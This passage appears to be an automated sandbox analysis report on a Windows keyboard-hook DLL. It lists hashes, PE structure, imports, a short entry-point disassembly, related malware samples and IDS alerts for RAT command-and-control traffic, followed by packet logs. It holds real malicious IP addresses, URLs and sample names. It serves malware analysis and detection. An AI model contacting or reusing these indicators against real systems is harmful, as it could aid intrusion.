Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	powerpc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	1.13.202.149
	Tii6ue74NB.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, Vidar	Browse	104.21.67.146
	Non-Disclosure Agreement.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	rs.lnk.d.lnk	Get hash	malicious	Unknown	Browse	172.67.211.185
	ny.lnk.d.lnk	Get hash	malicious	Unknown	Browse	104.21.93.157
	hnsadjhfg18De.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	slifdgjsidfg19.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	De17De16.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	fghdsdf17.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS	Browse	172.67.179.109
ICENET-AS-ININFONETCOMMENTERPRISESIN	https://www.amerazcicanexcddazpress.com.fhjhfzfgb.top/jp	Get hash	malicious	Unknown	Browse	114.29.238.135
	vBViMyeCyp.elf	Get hash	malicious	Mirai	Browse	103.252.119.85
	JfD2RoSJBo.elf	Get hash	malicious	Mirai	Browse	103.252.119.85
	KGw7VopK4y.elf	Get hash	malicious	Mirai	Browse	103.252.119.85
	2xHAtfspoM.elf	Get hash	malicious	Mirai	Browse	103.252.119.85
	gsp8qKxmsq.elf	Get hash	malicious	Mirai	Browse	103.252.119.85
	lWpcobLwbe.elf	Get hash	malicious	Unknown	Browse	103.252.119.85
	cn6l98FxBA.elf	Get hash	malicious	Mirai	Browse	103.252.119.85
	y6MBI3E72d.elf	Get hash	malicious	Mirai	Browse	103.252.119.85
	ImN8NYNxKC.elf	Get hash	malicious	Mirai	Browse	103.252.119.85
PERMANETASIE	atH4SE3Oi6.elf	Get hash	malicious	Mirai	Browse	88.151.30.190
	jade.ppc.elf	Get hash	malicious	Mirai	Browse	88.151.30.191
	https://bet958d.com/	Get hash	malicious	Unknown	Browse	81.31.208.67
	mRlQSg5x9n.elf	Get hash	malicious	Mirai	Browse	88.151.30.199
	Kfak0qsHSB.elf	Get hash	malicious	Mirai	Browse	88.151.30.180
	Bt4Vc4lw3J.elf	Get hash	malicious	Mirai	Browse	88.151.29.233
	xd71bUi4mH.elf	Get hash	malicious	Mirai	Browse	88.151.30.184
	lO4HWKcSF7.elf	Get hash	malicious	Mirai	Browse	88.151.30.183
	ugy3koBFUO.elf	Get hash	malicious	Mirai	Browse	88.151.30.191
	4JV1A84sXC.elf	Get hash	malicious	Mirai	Browse	88.151.30.194

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
74954a0c86284d0d6e1c4efefe92b521	67618a47ee8c5.vbs	Get hash	malicious	Mint Stealer	Browse	104.21.40.214
	PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.hta	Get hash	malicious	Mint Stealer	Browse	104.21.40.214
	webhook.exe	Get hash	malicious	Unknown	Browse	104.21.40.214
	loader.exe	Get hash	malicious	Unknown	Browse	104.21.40.214
	loader.exe	Get hash	malicious	Unknown	Browse	104.21.40.214
	chos.exe	Get hash	malicious	Unknown	Browse	104.21.40.214
	file.exe	Get hash	malicious	Unknown	Browse	104.21.40.214
	yiDQb6GkBq.exe	Get hash	malicious	Amadey, LummaC Stealer, Vidar	Browse	104.21.40.214
	Document.lnk.download.lnk	Get hash	malicious	Unknown	Browse	104.21.40.214
	aLsxeH29P2.exe	Get hash	malicious	Unknown	Browse	104.21.40.214

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	data
Category:	dropped
Size (bytes):	320512
Entropy (8bit):	7.999377998733749
Encrypted:	true
SSDEEP:	6144:0qnSrbjIU5PMw/sT5ZOzf62IFFOdD/r8N20lchIIvw7KvpwhfeSi:SrYOMQsq+1j2/ANZlcrBvUXi
MD5:	3A5E4DA991963603A42E9D38EF255275
SHA1:	EB98FE4663206F43575A74EC9FFD5A2674AD7169
SHA-256:	D50FB3CE4D58AC4E8A71B1517DC1BFFB98D49A4CC03B65C2EFE36E719BA0B78F
SHA-512:	8C96D0309505407D829F1CC37D5207852303A4A915BF81AA3CDB64CAD3DAA968FF5D105DCF2CDEBA9613108BE638259AC47FDFD4C349A8B1C993354634170E8B
Malicious:	false
Preview:	(.b...#....E.=.. ....J..8..66W0OG......y.....-u............<..$XS.^)I.z......?.\|.J..+L.@.S-..{.F...2!...2.&3...s......7..S.oT8.A.Z.f...:.CX7K.....s..v..>.&...X...."..5s..H.ERk.^...FC..yA.T.41.<U......X.V%.....W......[W.....OZkba..\.q.......(^=..l:..72.......B.v\|<$...\\|..../U...c..R.....\|...{...P.I.'....q...]...Lj..............].[i.P..(..K...7.>dD&.=.(.....<`...._.h.X..<gf.<7 .~..qBl.0.qf.....2f..D.....Y.\.1\|......Z")....I.....M.b7.F..w....Wr<...~.c/:..?..J...x..!!...x...p!..c.38^.M.,Z...J..NlQ./...`...+..W...$.4!.......Y..B...z._.....\|N..mSfV...r.?/..G}..y.\......WH.yf...A.+..e..I6...=."N+...0d...!.)"..K.\.....qH}.+...=.v~^U......K...}.r..>.Rz..-(.s..x.m.Oc.]6... p...s...&.O3Y...P.xTq.6..Eu.B....... .!m<.....1.S&...._.\.&(..y._..L.pw2.N,hU4.-...H..Ebw.4.@.M.8;...]..$U8.wN.M....M. ..V.....iEp.(Q...;M...pvF*r.NT."..x...........J.Q.....Yf...gQ. O...)....H0NrL`a.E..H.......{s..G..w. v!......i.K...2...mUD\..Z.....7.#\|..0...h.......4...lOR.

Static File Info

General

File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.677771877868924
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Hkeyboard.dll
File size:	644'608 bytes
MD5:	74180139ac5989392ea788036116a937
SHA1:	703f9052ef90dd93ee0b4e84dd48c131b423208b
SHA256:	6fd79201ed86080b03d8bd1ea1b8251eef8c86b242cf1406b6cad9d84b9cd0d9
SHA512:	01dbc1d6d3a87ea13ad979488dae14f9d55bec61c60c2cfc8cf7574cc09cce83f7296db7aa5d259e989c7b0dc24d3c7de6005da967be7bdecf358e3955bf33de
SSDEEP:	12288:wa0Afeulxl/MWKrUEJDeqKGFC+nvmSoNa9B0uemUlcnyj:h0+MWKrLvC+nvSO0urUr
TLSH:	38D49D92B98090F2F68A103D51BB9B770E3DA5245760D9C797E459F88E303D0B67E38E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.XB..6...6...6.W.5...6.W.3...6.W.2...6..?....6..?5...6..?2...6.W>2.d.6..?3.Y.6.W.7...6...7...6.W>?...6.W>6...6.W>....6.W>4...6

File Icon


Icon Hash:	7ae282899bbab082

Static PE Info

General

Entrypoint:	0x10058d74
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x675E3FE1 [Sun Dec 15 02:33:05 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	33bdf2448a4b47914ed223696aa1d3a3

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007FDCF4EB3697h
call 00007FDCF4EB4417h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007FDCF4EB3543h
add esp, 0Ch
pop ebp
retn 000Ch
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
lea edx, dword ptr [ecx+18h]
add edx, eax
movzx eax, word ptr [ecx+06h]
imul esi, eax, 28h
add esi, edx
cmp edx, esi
je 00007FDCF4EB36ABh
mov ecx, dword ptr [ebp+0Ch]
cmp ecx, dword ptr [edx+0Ch]
jc 00007FDCF4EB369Ch
mov eax, dword ptr [edx+08h]
add eax, dword ptr [edx+0Ch]
cmp ecx, eax
jc 00007FDCF4EB369Eh
add edx, 28h
cmp edx, esi
jne 00007FDCF4EB367Ch
xor eax, eax
pop esi
pop ebp
ret
mov eax, edx
jmp 00007FDCF4EB368Bh
push esi
call 00007FDCF4EB45FDh
test eax, eax
je 00007FDCF4EB36B2h
mov eax, dword ptr fs:[00000018h]
mov esi, 1009A54Ch
mov edx, dword ptr [eax+04h]
jmp 00007FDCF4EB3696h
cmp edx, eax
je 00007FDCF4EB36A2h
xor eax, eax
mov ecx, edx
lock cmpxchg dword ptr [esi], ecx
test eax, eax
jne 00007FDCF4EB3682h
xor al, al
pop esi
ret
mov al, 01h
pop esi
ret
call 00007FDCF4EB45CCh
test eax, eax
je 00007FDCF4EB3699h
call 00007FDCF4EB39D6h
jmp 00007FDCF4EB36AAh
call 00007FDCF4EB45B8h
push eax
call 00007FDCF4EC7384h
pop ecx
test eax, eax
je 00007FDCF4EB3695h
xor al, al
ret
call 00007FDCF4EC7799h
mov al, 01h
ret
push 00000000h
call 00007FDCF4EB3765h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x97180	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x97220	0x8c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x9c000	0xf8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x9d000	0x5594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x95300	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x95240	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x80000	0x318	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x7e36a	0x7e400	274b87d225ed5a8d5bdaf675d38dcf45	False	0.5552173576732673	data	6.583197370496729	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x80000	0x18190	0x18200	d08aa2dc30b2d33b52208a0d5ab64743	False	0.40192883743523317	data	5.546039188919994	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x99000	0x2098	0x1400	636c071662bea2912a957a0565d308e3	False	0.212109375	DOS executable (block device driver)	3.4767308957177323	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x9c000	0xf8	0x200	032214cedc4f9f8a1c974bd7ef5de243	False	0.3359375	data	2.5273918504807127	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x9d000	0x5594	0x5600	fc2dd190a3b703e36c03d929c043cfc5	False	0.7239280523255814	data	6.677949155862938	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x9c060	0x91	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.8689655172413793

Imports

DLL	Import
KERNEL32.dll	GetCPInfo, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, QueryPerformanceCounter, GetTickCount, QueryPerformanceFrequency, GetSystemDirectoryA, FreeLibrary, GetModuleHandleA, GetLastError, SetLastError, FormatMessageW, MoveFileExA, WaitForSingleObjectEx, GetCurrentProcessId, GetStdHandle, GetFileType, PeekNamedPipe, WaitForMultipleObjects, SleepEx, VerSetConditionMask, VerifyVersionInfoW, CreateFileA, GetFileSizeEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, GetStartupInfoW, GetModuleHandleW, RtlUnwind, RaiseException, InterlockedFlushSList, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, GetStringTypeW, GetDriveTypeW, GetFileInformationByHandle, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, CreateThread, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, SetFilePointerEx, GetModuleFileNameW, GetConsoleMode, ReadConsoleW, WriteFile, GetConsoleOutputCP, HeapFree, HeapAlloc, FlushFileBuffers, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, HeapReAlloc, GetTimeZoneInformation, GetFileAttributesExW, SetStdHandle, SetEndOfFile, GetCurrentDirectoryW, GetFullPathNameW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, GetProcessHeap, DeleteFileW, HeapSize, WriteConsoleW, LCMapStringEx, WideCharToMultiByte, MultiByteToWideChar, DecodePointer, EncodePointer, DeleteCriticalSection, InitializeCriticalSectionEx, LeaveCriticalSection, EnterCriticalSection, CloseHandle, ReadFile, Sleep, GetFileSize, LoadLibraryA, GetProcAddress, GetEnvironmentVariableA, ExitProcess, IsDebuggerPresent, CreateFileW, GetModuleFileNameA
ADVAPI32.dll	CryptAcquireContextA, CryptReleaseContext, CryptGetHashParam, CryptCreateHash, CryptHashData, CryptDestroyHash, CryptDestroyKey, CryptImportKey, CryptEncrypt, RegOpenKeyExA, RegCloseKey, RegSetValueExA
bcrypt.dll	BCryptGenRandom
WS2_32.dll	gethostname, WSACleanup, getpeername, sendto, recvfrom, freeaddrinfo, getaddrinfo, recv, listen, htonl, getsockname, connect, bind, accept, select, __WSAFDIsSet, socket, htons, WSAIoctl, setsockopt, ioctlsocket, WSASetLastError, ntohs, WSAGetLastError, closesocket, WSAWaitForMultipleEvents, WSAResetEvent, WSAEventSelect, WSAEnumNetworkEvents, WSACreateEvent, WSACloseEvent, send, getsockopt, WSAStartup
WLDAP32.dll
CRYPT32.dll	CertFreeCertificateChain, CertFindExtension, CertGetCertificateChain, CertFreeCertificateChainEngine, CertGetNameStringA, CryptQueryObject, CertCreateCertificateChainEngine, CertAddCertificateContextToStore, CryptDecodeObjectEx, PFXImportCertStore, CryptStringToBinaryA, CertFreeCertificateContext, CertFindCertificateInStore, CertEnumCertificatesInStore, CertCloseStore, CertOpenStore

Exports

Name	Ordinal	Address
?InstallKBHook@@YAHXZ	1	0x10002750
?SetDisablePrintScreen@@YAXH@Z	2	0x10002760
?UnInstallKBHook@@YAHXZ	3	0x10002770

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-19T14:48:19.112652+0100	2049151	ET MALWARE Win32/Unknown RAT CnC Server Acknowledgement	1	81.31.208.36	8081	192.168.2.6	49736	TCP
2024-12-19T14:49:04.243762+0100	2049151	ET MALWARE Win32/Unknown RAT CnC Server Acknowledgement	1	81.31.208.36	8081	192.168.2.6	49736	TCP
2024-12-19T14:49:49.156685+0100	2049151	ET MALWARE Win32/Unknown RAT CnC Server Acknowledgement	1	81.31.208.36	8081	192.168.2.6	49736	TCP
2024-12-19T14:50:34.179212+0100	2049151	ET MALWARE Win32/Unknown RAT CnC Server Acknowledgement	1	81.31.208.36	8081	192.168.2.6	49736	TCP
2024-12-19T14:51:19.204984+0100	2049151	ET MALWARE Win32/Unknown RAT CnC Server Acknowledgement	1	81.31.208.36	8081	192.168.2.6	49736	TCP
2024-12-19T14:52:04.301629+0100	2049151	ET MALWARE Win32/Unknown RAT CnC Server Acknowledgement	1	81.31.208.36	8081	192.168.2.6	49736	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 19, 2024 14:48:11.501795053 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:11.501844883 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:11.501960993 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:11.521611929 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:11.521657944 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:11.521724939 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:11.536657095 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:11.536669016 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:11.536673069 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:11.536689043 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:12.761960030 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:12.762056112 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:12.765378952 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:12.765486956 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:12.785434961 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:12.785454988 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:12.786351919 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:12.813240051 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:12.813261032 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:12.814246893 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:12.841212988 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:12.866628885 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:12.877531052 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:12.918824911 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:12.923337936 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:12.963340998 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.618282080 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.618668079 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.618709087 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.618710041 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.618724108 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.618762016 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.618769884 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.619278908 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.619330883 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.619348049 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.633621931 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.633786917 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.633810043 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.638286114 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.638417959 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.638468981 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.638489962 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.638576984 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.638617039 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.638626099 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.640552998 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.640630007 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.640645027 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.641952991 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.642003059 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.642014980 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.649019957 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.649077892 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.649099112 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.657521963 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.657577991 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.657589912 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.694643974 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.710295916 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.738006115 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.757550955 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.788393021 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.788407087 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.804019928 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.804040909 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.824132919 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.824186087 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.824196100 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.829626083 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.829678059 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.829684973 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.837346077 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.837390900 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.837397099 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.837413073 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.837471962 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.837488890 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.837826967 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.837865114 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.837874889 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.845139980 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.845199108 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.845212936 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.845498085 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.845545053 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.845552921 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.852910995 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.852971077 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.852978945 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.860049963 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.860095978 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.860112906 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.860188961 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.860236883 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.860244989 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.860663891 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.860718012 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.860723972 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.867503881 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.867553949 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.867567062 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.868252993 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.868305922 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.868311882 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.876034021 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.876091003 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.876097918 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.882456064 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.882504940 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.882519007 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.883807898 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.883853912 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.883860111 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.889990091 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.890032053 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.890047073 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.891408920 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.891459942 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.891465902 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.897571087 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.897623062 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.897636890 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.897721052 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.897773027 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.897782087 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.899245977 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.899295092 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.899302006 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.905180931 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.905230045 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.905245066 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.907058001 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.907104969 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.907113075 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:13.960284948 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.960284948 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:13.960304976 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.007149935 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.025412083 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.025707006 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.030216932 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.030272961 CET	49726	443	192.168.2.6	104.21.40.214
